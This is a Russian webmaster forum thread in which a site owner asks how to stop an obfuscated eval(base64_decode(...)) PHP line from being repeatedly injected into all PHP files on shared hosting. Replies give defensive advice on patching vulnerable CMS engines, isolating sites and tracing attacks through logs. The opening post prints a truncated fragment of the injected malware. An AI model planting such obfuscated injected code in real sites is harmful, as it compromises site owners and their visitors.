Форум Сайтостроение Веб-строительство

Вставили код во все *.php файлы

mamakadze
На сайте с 25.01.2012
Offline
73
mamakadze
705

2 раз уже во все php файлы на хостинге вставили код:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVy и т.д.

Менял все пароли, к сожалению движки сайтов разные: дле, джумла, вордпресс, инстант.

Все почистил, восстановил, что смог обновил, сейчас опять везде присвоили, опять работы на пол дня, так как почти 1млн файлов там. Помогите как бороться, хотя все сайты работаю нормально...

StAlKeR-xXl
На сайте с 01.07.2011
Offline
45
StAlKeR-xXl
#1

mamakadze,

1) нужно устранить проблему, а не ее последствия.. То есть, если у вас один из движков/модулей с уязвимостью - то смена пароля не поможет..

2) если сайтов много - лучше раскидать их на сервере на разные учетки юзеров и под open_base_dir (то бишь при заливке шелла на один сайт- другие будут недоступны)...

3) смотрите логи apache/ftp

не держите все [S]яйца[/S] сайты в одной [S]корзине[/S] поисковой системе....(c)
Проверить сайт на трой Помощь в устранении последствий Масовое обнаружение вредоносных кодов
[umka]
На сайте с 25.05.2008
Offline
456
[umka]
#2

1. Искать уязвимости

2. Устранять уязвимости

3. Менять пароли (опционально)

4. Удалять паразитный код.

Лог в помощь!
mamakadze
На сайте с 25.01.2012
Offline
73
mamakadze
#3

Вовремя заметил, сайты на джумле, вп и инстанте легли как и в последний взлом. ДЛЕ полет нормальный, но код во всех php файлах левый присутствует. Быстренько восстанавливаю

StAlKeR-xXl
На сайте с 01.07.2011
Offline
45
StAlKeR-xXl
#4

в логах apache можете по имени зараженного файла найти ip ... потом фильтр поиска- этот ip.. возможно найдете "уязвимый файл", через который ломают или шелл....

---------- Добавлено 03.04.2013 в 20:19 ----------

и в логах фтп также смотрите.. так как неизвестно через что ломают...

Ломанули. Просела посещаемость. Помогите почистить сайт от На сайте появился новый
mamakadze
На сайте с 25.01.2012
Offline
73
mamakadze
#5

Что самое интересное, при добавлении в файл кода, дата не изменяется...

StAlKeR-xXl
На сайте с 01.07.2011
Offline
45
StAlKeR-xXl
#6

тогда таким способом

StAlKeR-xXl:
в логах apache можете по имени зараженного файла найти ip ... потом фильтр поиска- этот ip.. возможно найдете "уязвимый файл", через который ломают или шелл....
IL
На сайте с 20.04.2007
Offline
435
ivan-lev
#7
mamakadze:
Что самое интересное, при добавлении в файл кода, дата не изменяется...

в linux-е у файла 3 даты.. смотрите другие... filectime

p.s. А кто-нибудь вообще прилепленную тему читает?

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )
StAlKeR-xXl
На сайте с 01.07.2011
Offline
45
StAlKeR-xXl
#8
ivan-lev:
p.s. А кто-нибудь вообще прилепленную тему читает?

ну может у человека дырка в движке... тут уж никак не закрыться, кроме закрытия самой дырки/апдейта версии движка...

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#9
StAlKeR-xXl:
ну может у человека дырка в движке...

И она мешает закреплённый топик найти? Хотя бы первые 3 страницы (дальше флуд в основном).

Так и тянет сказать, где в реальности дырка..

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
uberchel
На сайте с 16.01.2010
Offline
70
uberchel
#10

Если вы при закачке удаляли все с хоста, то тут скорей всего вина хостеров, их ломанули.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий